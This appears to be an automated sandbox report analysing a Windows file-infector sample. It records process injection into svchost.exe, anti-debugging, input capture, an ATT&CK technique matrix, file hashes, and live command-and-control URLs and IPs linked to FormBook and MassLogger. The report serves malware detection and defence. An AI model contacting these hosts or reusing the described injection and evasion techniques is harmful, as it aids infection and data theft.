          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B649D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BC69C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03C04940 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BB892A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BC892B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BBC912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B28918 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B28918 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BAE908 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BAE908 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BD4978 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BD4978 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BBC97C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B56962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B56962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B56962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B7096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B7096E mov edx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B7096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BB0946 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03C008C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BBC89D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B30887 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B52835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_0042A124 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_02F91361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_02F94C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3053008
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_004587B1 LogonUserW
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_00464C53 mouse_event
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LiuUGJK9vH.exe"
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
          Source: LiuUGJK9vH.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: LiuUGJK9vH.exe | Binary or memory string: Shell_TrayWnd
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_0042862B cpuid
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\AppVClient.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_00441E06 GetUserNameW
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

          Stealing of Sensitive Information

          barindex
          Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: LiuUGJK9vH.exe | Binary or memory string: WIN_81
          Source: LiuUGJK9vH.exe | Binary or memory string: WIN_XP
          Source: LiuUGJK9vH.exe | Binary or memory string: WIN_XPe
          Source: LiuUGJK9vH.exe | Binary or memory string: WIN_VISTA
          Source: LiuUGJK9vH.exe | Binary or memory string: WIN_7
          Source: LiuUGJK9vH.exe | Binary or memory string: WIN_8
          Source: LiuUGJK9vH.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          2
          Native API
          1
          LSASS Driver
          1
          Exploitation for Privilege Escalation
          1
          Disable or Modify Tools
          21
          Input Capture
          2
          System Time Discovery
          1
          Taint Shared Content
          1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          Service Execution
          1
          DLL Side-Loading
          1
          LSASS Driver
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory1
          Account Discovery
          Remote Desktop Protocol21
          Input Capture
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt2
          Valid Accounts
          1
          DLL Side-Loading
          3
          Obfuscated Files or Information
          Security Account Manager1
          File and Directory Discovery
          SMB/Windows Admin Shares3
          Clipboard Data
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCron1
          Windows Service
          2
          Valid Accounts
          1
          Software Packing
          NTDS125
          System Information Discovery
          Distributed Component Object ModelInput Capture12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
          Access Token Manipulation
          1
          Timestomp
          LSA Secrets151
          Security Software Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
          Windows Service
          1
          DLL Side-Loading
          Cached Domain Credentials2
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items212
          Process Injection
          221
          Masquerading
          DCSync3
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
          Valid Accounts
          Proc Filesystem1
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
          Virtualization/Sandbox Evasion
          /etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
          Access Token Manipulation
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
          Process Injection
          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Source | Detection | Scanner | Label
          LiuUGJK9vH.exe | 92% | ReversingLabs | Win32.Virus.Expiro
          LiuUGJK9vH.exe | 100% | Avira | W32/Infector.Gen
          LiuUGJK9vH.exe | 100% | Joe Sandbox ML |
          Source | Detection | Scanner | Label
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
          C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | 100% | Avira | W32/Infector.Gen
          C:\Windows\System32\AppVClient.exe | 100% | Avira | W32/Infector.Gen
          C:\Windows\System32\alg.exe | 100% | Avira | W32/Infector.Gen
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
          C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | 100% | Joe Sandbox ML |
          C:\Windows\System32\AppVClient.exe | 100% | Joe Sandbox ML |
          C:\Windows\System32\alg.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label
          http://18.141.10.107:80/rai | 0% | Avira URL Cloud | safe
          http://54.244.188.177/ | 100% | Avira URL Cloud | malware
          http://54.244.188.177/hdjf~A | 100% | Avira URL Cloud | malware
          http://54.244.188.177/hdjf | 100% | Avira URL Cloud | malware
          http://18.141.10.107/8 | 0% | Avira URL Cloud | safe
          http://18.141.10.107/raie | 0% | Avira URL Cloud | safe
          http://18.141.10.107/x | 0% | Avira URL Cloud | safe
          http://18.141.10.107/raiI | 0% | Avira URL Cloud | safe
          http://18.141.10.107/rai | 0% | Avira URL Cloud | safe
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          ssbzmoy.biz | 18.141.10.107 | true | false | | high
          pywolwnvd.biz | 54.244.188.177 | true | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          http://ssbzmoy.biz/rai | false | | high
          http://pywolwnvd.biz/hdjf | false | | high
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://54.244.188.177/hdjf~A | LiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://18.141.10.107/raie | LiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://18.141.10.107/8 | LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://18.141.10.107/x | LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://18.141.10.107/rai | LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://54.244.188.177/ | LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://54.244.188.177/hdjf | LiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://18.141.10.107/ | LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://18.141.10.107/raiI | LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://18.141.10.107:80/rai | LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    54.244.188.177 | pywolwnvd.biz | United States | 16509 | AMAZON-02US | false
                    18.141.10.107 | ssbzmoy.biz | United States | 16509 | AMAZON-02US | false
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1588299
                    Start date and time:2025-01-10 23:39:52 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 0s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:3
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:LiuUGJK9vH.exe
                    renamed because original name is a hash value
                    Original Sample Name:1273e390eab2f69aa5ed380f296a7cd6c8ff01142367fe5dd76eae5f515947e2.exe
                    Detection:MAL
                    Classification:mal100.spre.troj.evad.winEXE@6/10@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 73
                    • Number of non-executed functions: 246
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • VT rate limit hit for: LiuUGJK9vH.exe
                    Time | Type | Description
                    17:40:53 | API Interceptor | 1x Sleep call for process: LiuUGJK9vH.exe modified
                    17:41:22 | API Interceptor | 3x Sleep call for process: svchost.exe modified
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    54.244.188.177 | UaOJAOMxcU.exe | malicious | FormBook | pywolwnvd.biz/rhimsaly
                    54.244.188.177 | SABXJ1B5c8.exe | malicious | MassLogger RAT | cvgrf.biz/kmpia
                    54.244.188.177 | I3LPkQh2an.exe | malicious | FormBook | lrxdmhrr.biz/rwlfutjcp
                    54.244.188.177 | OVZizpEU7Q.exe | malicious | FormBook | pywolwnvd.biz/wlyolqts
                    54.244.188.177 | RJKUWSGxej.exe | malicious | AgentTesla, RedLine | lrxdmhrr.biz/tbbwyfgx
                    54.244.188.177 | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | lrxdmhrr.biz/fncvigkebkn
                    54.244.188.177 | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | cvgrf.biz/dy
                    54.244.188.177 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | cvgrf.biz/ubwy
                    54.244.188.177 | INV_NE_02_2034388.exe | malicious | FormBook | cvgrf.biz/mddjrljmh
                    54.244.188.177 | Shipment Notification.exe | malicious | FormBook | cvgrf.biz/pm
                    18.141.10.107 | SABXJ1B5c8.exe | malicious | MassLogger RAT | knjghuig.biz/wmfptllh
                    18.141.10.107 | I3LPkQh2an.exe | malicious | FormBook | warkcdu.biz/gloumaahxxajxf
                    18.141.10.107 | RJKUWSGxej.exe | malicious | AgentTesla, RedLine | warkcdu.biz/d
                    18.141.10.107 | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | vcddkls.biz/we
                    18.141.10.107 | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | vcddkls.biz/kknpblsbxdrrjko
                    18.141.10.107 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | knjghuig.biz/nfm
                    18.141.10.107 | INV_NE_02_2034388.exe | malicious | FormBook | vcddkls.biz/x
                    18.141.10.107 | Shipment Notification.exe | malicious | FormBook | knjghuig.biz/hsyjdjsftfdjf
                    18.141.10.107 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | vcddkls.biz/lqpvpf
                    18.141.10.107 | Request for Quotation.exe | malicious | FormBook | vcddkls.biz/ytpebbldheutao
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    ssbzmoy.biz | UaOJAOMxcU.exe | malicious | FormBook | 18.141.10.107
                    ssbzmoy.biz | SABXJ1B5c8.exe | malicious | MassLogger RAT | 18.141.10.107
                    ssbzmoy.biz | I3LPkQh2an.exe | malicious | FormBook | 18.141.10.107
                    ssbzmoy.biz | OVZizpEU7Q.exe | malicious | FormBook | 18.141.10.107
                    ssbzmoy.biz | RJKUWSGxej.exe | malicious | AgentTesla, RedLine | 18.141.10.107
                    ssbzmoy.biz | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
                    ssbzmoy.biz | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 18.141.10.107
                    ssbzmoy.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 18.141.10.107
                    ssbzmoy.biz | INV_NE_02_2034388.exe | malicious | FormBook | 18.141.10.107
                    ssbzmoy.biz | Shipment Notification.exe | malicious | FormBook | 18.141.10.107
                    pywolwnvd.biz | UaOJAOMxcU.exe | malicious | FormBook | 54.244.188.177
                    pywolwnvd.biz | SABXJ1B5c8.exe | malicious | MassLogger RAT | 54.244.188.177
                    pywolwnvd.biz | I3LPkQh2an.exe | malicious | FormBook | 54.244.188.177
                    pywolwnvd.biz | OVZizpEU7Q.exe | malicious | FormBook | 54.244.188.177
                    pywolwnvd.biz | RJKUWSGxej.exe | malicious | AgentTesla, RedLine | 54.244.188.177
                    pywolwnvd.biz | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 54.244.188.177
                    pywolwnvd.biz | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 54.244.188.177
                    pywolwnvd.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 54.244.188.177
                    pywolwnvd.biz | INV_NE_02_2034388.exe | malicious | FormBook | 54.244.188.177
                    pywolwnvd.biz | Shipment Notification.exe | malicious | FormBook | 54.244.188.177
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    AMAZON-02US | 5CTbduoXq4.exe | malicious | FormBook | 13.228.81.39
                    AMAZON-02US | gH3LlhcRzg.exe | malicious | FormBook | 13.248.169.48
                    AMAZON-02US | UaOJAOMxcU.exe | malicious | FormBook | 54.244.188.177
                    AMAZON-02US | 0Wu31IhwGO.exe | malicious | FormBook | 18.139.62.226
                    AMAZON-02US | https://www.shinsengumiusa.com/mrloskie | malicious | Unknown | 3.120.85.61
                    AMAZON-02US | SABXJ1B5c8.exe | malicious | MassLogger RAT | 18.141.10.107
                    AMAZON-02US | fFoOcuxK7M.exe | malicious | FormBook | 13.248.169.48
                    AMAZON-02US | NFhRxwbegd.exe | malicious | FormBook | 18.139.62.226
                    AMAZON-02US | I3LPkQh2an.exe | malicious | FormBook | 18.141.10.107
                    AMAZON-02US | statement.doc | malicious | KnowBe4 | 52.217.123.201
                    No context
                    No context

Process: C:\Users\user\Desktop\LiuUGJK9vH.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1658880
Entropy (8bit): 4.312990393887855
Encrypted: false
SSDEEP: 24576:JxGBcml8Vg9N9JMlDlfjRiVuVsWt5MJMs:vGy+cgFIDRRAubt5M
MD5: 1E28FD404AAE9396AA5D6A1141873E0E
SHA1: 1C46C05FB4E4792F1363F82274A529083BE024BB
SHA-256: DD219EE79A5A8FD649127D90243C3631C275BFE581C85D8F6775B2427F66F38A
SHA-512: D3580EBBA7B815E1D2B0677399D254B85C2FE23E79DBCBD2D27E4C58D54EC2981FC53930FA9FA71F79E2614040B4C705AE468D20ADBF3EF672AADC46C2104119
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\LiuUGJK9vH.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.996029064087877
Encrypted: true
SSDEEP: 3072:9PvhbrrJ394XuFfmGOZrfsDjmkJ9uGaVKPkmig2C3+11IcEjIXfvnn4wb3xwTNqM:9d539dhIC59uxZH1gIXH4o2A3zGoG
MD5: 2E632CF2FD60FCFDA595613C1DDA8C83
SHA1: 4B341A13918BF2390C6FB4E50C9C66563484793E
SHA-256: 808E1F6C73AE2292BD8F99298F685B1A07E601892E6278397E36F97A9CEFCAFB
SHA-512: D1410B18EC235230BAC3A7FBE6D2ED9F74A6755F4BAE170E4F534C27AFEAD2A752D50E29C289BF7E599B0E11F3D4B2FDCBF08BB7221A4BEEEF488DC9A47D6A9B
Malicious: false
Reputation: low
                    Preview:...E4ROQMPNL..06.NSBTWCC.GHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNL.106HQ.LT.J.u.I..s.9 #n<+^WD'#s!59-, g* . :?i9 l.~c.+!7'zZNIpGHE7ROQ0QG.dQW.{.4.i7$.N...2(.S..eQW.\...h7$...+-.2(.IPNLY106..SB.VBC..m.7ROQIPNL.127MOXBT.GCTGHE7ROQIENLY!06F>WBTW.CTWHE7POQOPNLY106@NSBTWCCT7LE7POQIPNL[1p.FNCBTGCCTGXE7BOQIPNLI106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCz3-=CROQ..JLY!06F.WBTGCCTGHE7ROQIPNLy10VFNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNLY106

A second dropped file, also written by C:\Users\user\Desktop\LiuUGJK9vH.exe, has exactly the same content as the entry above (size 288768, entropy 7.996029064087877, Encrypted: true, MD5 2E632CF2FD60FCFDA595613C1DDA8C83, SHA1 4B341A13918BF2390C6FB4E50C9C66563484793E, SHA-256 808E1F6C73AE2292BD8F99298F685B1A07E601892E6278397E36F97A9CEFCAFB, identical preview); it is likewise rated Malicious: false, Reputation: low.
